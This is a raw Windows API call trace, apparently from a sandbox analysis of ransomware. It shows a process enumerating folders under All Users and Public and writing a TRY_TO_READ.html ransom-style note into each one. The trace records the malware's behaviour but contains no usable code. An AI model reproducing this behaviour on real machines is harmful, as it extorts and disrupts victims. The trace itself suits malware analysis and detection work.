	[0053.112] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.112] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.113] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.113] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.113] CloseHandle (hObject=0x454) returned 1
	[0053.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584810 | out: hHeap=0x540000) returned 1
	[0053.113] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1
	[0053.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.113] GetLastError () returned 0x0
	[0053.113] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Oracle\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\oracle\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.114] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.114] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.114] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.114] CloseHandle (hObject=0x454) returned 1
	[0053.115] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.115] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.115] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.115] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x540000) returned 1
	[0053.115] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1
	[0053.115] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.115] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.115] GetLastError () returned 0x0
	[0053.115] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.117] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x591a38 | out: hHeap=0x540000) returned 1
	[0053.117] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.118] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.118] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.118] CloseHandle (hObject=0x454) returned 1
	[0053.118] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.118] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.118] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.118] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bc00 | out: hHeap=0x540000) returned 1
	[0053.118] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0053.119] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.119] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.119] GetLastError () returned 0x0
	[0053.119] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Start Menu\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\start menu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.120] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.120] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.121] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.121] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.121] CloseHandle (hObject=0x454) returned 1
	[0053.123] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.124] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.124] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.124] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5848a0 | out: hHeap=0x540000) returned 1
	[0053.124] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1
	[0053.124] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.124] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.124] GetLastError () returned 0x0
	[0053.124] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Sun\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\sun\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.125] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.125] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.125] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.126] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.126] CloseHandle (hObject=0x454) returned 1
	[0053.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0053.126] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0053.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.126] GetLastError () returned 0x0
	[0053.126] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Templates\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\templates\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.127] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.127] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.128] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.128] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.128] CloseHandle (hObject=0x454) returned 1
	[0053.128] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.128] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.128] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.128] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5848e8 | out: hHeap=0x540000) returned 1
	[0053.128] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9d6ecd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d6ecd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0053.128] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.128] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.128] GetLastError () returned 0x0
	[0053.128] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9d6ecd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d6ecd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0053.129] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e18 | out: hHeap=0x540000) returned 1
	[0053.129] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default User\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9d6ecd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d6ecd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0053.129] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583aa0 | out: hHeap=0x540000) returned 1
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0053.129] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9d6ecd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5758a0
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.129] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.129] GetLastError () returned 0x5
	[0053.129] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9d6ecd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.129] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.129] GetLastError () returned 0x5
	[0053.129] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0053.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.129] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.129] GetLastError () returned 0x5
	[0053.129] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.130] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.130] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.131] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.131] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.131] CloseHandle (hObject=0x458) returned 1
	[0053.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0053.131] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0053.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.132] GetLastError () returned 0xb7
	[0053.132] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0053.132] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.132] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.132] GetLastError () returned 0xb7
	[0053.132] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.132] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.132] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.133] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.133] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.133] CloseHandle (hObject=0x458) returned 1
	[0053.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5849c0 | out: hHeap=0x540000) returned 1
	[0053.134] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1
	[0053.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.134] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.134] GetLastError () returned 0xb7
	[0053.134] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\downloads\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.134] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
